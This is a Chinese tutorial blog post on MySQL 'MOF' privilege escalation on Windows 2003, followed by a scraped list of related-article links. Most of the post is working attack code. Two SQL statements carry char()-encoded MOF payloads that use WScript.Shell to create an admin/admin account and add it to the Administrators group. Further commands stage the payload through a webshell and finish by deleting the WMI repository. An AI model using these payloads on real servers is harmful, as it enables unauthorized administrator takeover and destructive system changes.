mysql mof提权_三、mysql 之mof提权学习
一、测试环境
win2003 + phpnow
二、使用条件
mysql + root权限
三、工具准备
(1)工具1: 准备好mof提权脚本(具体mof脚本,已上传网盘)
(2)工具2: 准备好菜刀(文件管理 + 数据库管理)
四、提权原理
上传mof提权脚本到mof默认加载目录(路径:c:/windows/system32/wbem/mof),系统会在每一分钟的某一个固定时间运行mof目录下的mof脚步文件,以下实验脚本是在每分钟的第5秒钟运行此脚本;
五、实现方法:
5.1 方法1:直接使用菜刀数据库管理功能,进行sql导出操作,导出mof的ascii文件到mof目录下
(参考:http://www.cnblogs.com/cnsanshao/p/5546872.html)
(1) 第一步:导出添加用户"mof脚本" (admin/admin)
select char(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,117,115,101,114,32,97,100,109,105,110,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
(1) 第二步:导出添加普通用户到超级管理组的“mof脚本 ”
select char(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,108,111,99,97,108,103,114,111,117,112,32,97,100,109,105,110,105,115,116,114,97,116,111,114,115,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
5.2 方法2: webshell低权限上传+sql root导出操作权限,实现mof上传至mof自动加载目录下;
(1) 第一步:在获取有低权限的webshell的情况下,直接上传“提权的两个mof脚本”到webshell可以写入的目录下;(这里假设可以写入的目录为c:/)
### 直接使用菜刀文件管理功能,进行mof提权脚本的上传即可。
(2) 第二步:使用mysql root权限可以写入文件到任何目录下的操作,导出已上传的mof文件到mof自动加载目录;
mysql> select load_file('c:/admin.mof') into dumpfile 'c:/windows/system32/wbem/mof/admin.mof';
注意:建议2分钟后,再导出“第二个添加用户组的mof脚本”;
mysql> select load_file('c:/admins.mof') into dumpfile 'c:/windows/system32/wbem/mof/admins.mof';
5.3 方法3: 如果直接获取有phpmyadmin的root操作权限,可以直接操作sql进行“ascii格式mof文件”导出;
导入语句,请见5.1
六、 提权扫尾工作
默认上传mof脚本,它还是会在每分钟的第5s添加一次用户,那如何解决这个问题,具体操作如下:
第一 net stop winmgmt 停止服务,
第二 删除文件夹:rd /s/q C:\WINDOWS\system32\wbem\Repository
第三 net start winmgmt 启动服务
mysql mof提权_三、mysql 之mof提权学习相关推荐
- mysql udf提权_三分钟解析postgresql提权
本头条号所分享文章仅供学习交流,请勿非法使用! 近期遇到一些关于提权的问题,和大家分享一下~ 创建环境 介绍 docker中有一个COPY命令: COPY 在 PostgreSQL表和标准文件系统文件 ...
- mysql报错注入_关于Mysql注入过程中的三种报错方式
放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据. 实际测试环境: Default m ...
- mysql 禁止插入重复数据_防止MySQL重复插入数据的三种方法
新建表格 CREATE TABLE `person` ( `id` int NOT NULL COMMENT '主键', `name` varchar(64) CHARACTER SET utf8 C ...
- mysql配置数据库连接池_三种数据库连接池的配置
三种数据库连接池的配置及使用(For JDBC) 连接池的优缺点 优点 使用连接池的最主要的优点是性能.创建一个新的数据库连接所耗费的时间主要取决于网络的速 度以及应用程序和数据库服务器的 ( 网络 ...
- mysql初始设置_三 mysql 初始配置
常用命令: service mysql start service mysql stop service mysql restart 登录mysql /www/lnmp/mysql/bin/mysql ...
- mysql添加函数库_创建mysql函数
如何使用MySQL提升权限 前不久网上公开了一个MySQL Func的漏洞,讲的是使用MySQL创建一个自定义的函数,然后通过这个函数来攻击服务器.最早看到相关的报道是在o-otik上,但是公布的是针 ...
- mysql数据库范围之内_是mysql范围
MySQL数据类型-decimal详解 1.首先,对于精度比较高的东西,比如money,我会用decimal类型,不会考虑float,double,因为他们容易产生误差,numeric和decimal ...
- 找回mysql账号密码怎么办_找回mysql用户
MySQL_忘记Root密码并找回 Mysql找回Root密码 首先,大家如果看到有什么不懂的地方,欢迎吐槽!!! 我会在当天或者第二天及时回复,并且改进~~ 一.首先确认服务器出于安全的状态,也就是 ...
- mysql数据库建仓范式_存mysql个数
MySQL学习笔记之数据类型详解 注:以下内容针对MySQL5.0及以上版本 MySQL的数据类型非常多,选择正确的数据类型对于获得高性能至关重要,本文是我结合网上看到的一些blog加上<高性能 ...
最新文章
- 今日宇宙最热科技:人工智能可预测死亡时间,马斯克拿下美空军1.3亿合同!...
- HTML语义化:HTML5新标签——template
- 百分点内存数据库架构演变
- 关于SQL Server的若干注意事项
- 函数形参传递概念及问题分析
- 树莓派超声波模块测距
- Firefox删除DNS缓存——修改hosts后,无需关闭
- 手推机器学习公式(一) —— BP 反向传播算法
- jQuery-瀑布流-绝对定位布局(二)(延迟AJAX加载图片)
- 后端返回list前端如何处理_前端、后端、全栈是什么?薪资前景如何?
- ElasticStack系列之九 master、data 和 client 节点
- java枚举构造器_java枚举类的构造函数实例详解
- ESN学习笔记——echotorch(1)介绍
- linux文件误删恢复解决方案
- 程序员掉入传销组织用“代码”求救,同事秒懂
- 爱情、面包论——真正的爱情
- 静态监听 lsnrctl reload
- 如何提高文献检索能力?
- C语言 | getchar()、getche()、getch()的区别?
- Hive正则表达式案例总结
热门文章
- 字符串搜索算法:暴力搜索,KMP
- php session unset,PHP中session_unset()和session_destroy()的区别是什么
- 技术工坊|BANCOR算法详解及代码实现(上海)
- Java期末大作业——六级词汇学习系统
- XMU信息类电气实训_____PLC实训报告
- 程序员想干一辈子行不行?
- Go Slice【Go语言圣经笔记】
- .Net给图片加上文字
- The Inventor Mentor-第十二章 传感器
- 用javamail发送带附件的邮件